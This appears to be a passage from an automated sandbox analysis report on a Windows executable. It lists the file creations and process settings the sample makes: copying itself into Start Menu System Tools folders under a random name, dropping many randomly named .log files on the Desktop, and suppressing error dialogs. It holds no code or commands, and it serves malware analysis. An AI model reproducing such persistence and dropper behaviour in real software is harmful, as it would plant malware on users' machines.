                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YsCiJgGh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NEXrZULz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DVEbprGR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vrvmFyrk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ekfHlLLW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\baJGltgV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mdpOgNja.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\naQWCNyV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VOpRirdG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LfVByPYY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CwClOmSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kplGuznc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SdJAbeSN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zLWUHZHy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hzuPnDnj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fpYOnkHi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WLQZDrsB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NhIjUycT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\EzoTkVXm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vVgeAcHF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\njoWmzRS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kqZnADfT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JvdSwEFX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\roNndSaI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jKExtYKb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hAixtGfa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\QtRSZTAM.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FFnbpIFd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fUOHmcKi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NImBSGpT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CUHLiuul.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\tlovySpD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\aZMqfwUo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SvEAvCEH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KGTKXJkx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\dQWYMfTH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UmOidmEa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LEvStJys.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BVbCJhtL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\trTNZned.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jIzxpLYw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZaghFjTO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ITPCmwoz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ApHNCCYS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\gXUhixOD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YuMryEyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OLsbOcto.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NGhBOsDn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DXOleQyG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mQxGLdSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ccSQbSYJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JQrKHwDu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BmiVXCnN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sJafoJXg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jaGPEhSy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\QNeKkLxj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FUptAQNB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nNYOgdhm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eeFyxBcE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VBwJNHMX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LNSSdwSp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CjKdtCCI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zYgEJQlz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AVHMeQAt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qmowuovM.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\iIfHKufe.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XUBRajkw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\PrtbrpVP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FIZLHNPh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vZGvXkKA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eSpQDyfl.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cITPDfAk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TeKaTmkD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LBCkjtUW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BSjUAQPo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\toafQXzH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jFHPguuZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZXnzwSps.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IQXUcfJd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wWhDskZv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\otZOJrJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fPQYZyug.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WgxIpVoy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DUVDVzTj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cZaiSBtn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RlvripyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\AefMODTq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\rAWXeJDJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hMsguyJb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YjjrLEtu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\lZLXuWSy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nbyFPFWu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WUhawSrf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\MmOLMqmx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DDuvcNgQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sPQEsCmi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\bIzZYPGT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RZgJomBm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ASPeVAWX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yHtdVhrW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\pekolobp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\oZZOlFlp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XRIjRSGa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\PoAthZqt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FFhdxwlL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ntFYeaQw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\dKlIuyLO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SWHRKmQg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KszcatAz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JnnBaKLz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sgXWGXfk.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, File created: C:\Users\Default\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, File created: C:\Users\Default\Start Menu\Programs\System Tools\81acb8af1bb493
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, File created: C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, File created: C:\Users\user\Start Menu\Programs\System Tools\81acb8af1bb493
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
